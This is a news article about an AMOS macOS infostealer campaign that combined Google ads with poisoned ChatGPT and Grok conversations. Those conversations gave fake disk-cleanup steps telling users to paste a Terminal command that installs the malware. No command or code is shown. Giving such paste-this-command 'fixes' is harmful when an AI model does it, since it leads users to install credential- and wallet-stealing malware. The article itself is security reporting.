- AMOS operators used malvertising and poisoned ChatGPT/Grok conversations to push Mac malware
- Fake “free disk space” trick tricked users into running Terminal commands that installed AMOS
- The campaign abused Google ads and trusted AI platforms, increasing credibility and infection success
AtomicOS (AMOS) criminals use a combination of malvertising and GenAI response poisoning to trick MacOS users into downloading malware. This is according to cyber security researchers Huntress, who claim not only to have observed the attacks in the wild, but also to have replicated the same results with other victims.
In a blog post published earlier this week, Huntress said that AMOS maintainers first set up two AI conversations: one with ChatGPT and one with Grok.
These conversations were about freeing up disk space on a MacOS device and included instructions on how to do it. However, the instructions are bogus and instead ask the user to download the Terminal app and enter a command that will download and run AMOS infostealer.
A twist to ClickFix
From there, they bought ad space on Google to promote these conversations. That way, when a user searches for something like “how to clean up disk space on MacOS”, these poisoned conversations will appear at the very top of the search engine results page.
Apparently the trick worked, because Huntress was brought in to investigate a case of AMOS infections. For those unaware, AMOS is a notorious MacOS infostealer capable of stealing sensitive data, passwords, cryptocurrency wallet information and more.
The scam works similarly to ClickFix, another technique that tricks victims into running Terminal commands. The only difference is that in this case the victims are actually proactively looking for a solution to a real problem instead of a non-existent one. What makes this campaign more dangerous is that it abuses not one, but three trusted services – Google’s search engine, ChatGPT and Grok’s Answers.
At the end of the day, both conversations are hosted on their respective platforms, increasing the perceived legitimacy of both instructions. However, it is unclear how AMOS operators managed to get ChatGPT and Grok to display these results.
Via Apple Insider
The best antivirus for all budgets
Follow TechRadar on Google News and add us as a preferred source to get our expert news, reviews and opinions in your feeds. Be sure to click the Follow button!
And of course you can too follow TechRadar on TikTok for news, reviews, video unboxings, and get regular updates from us on WhatsApp also.
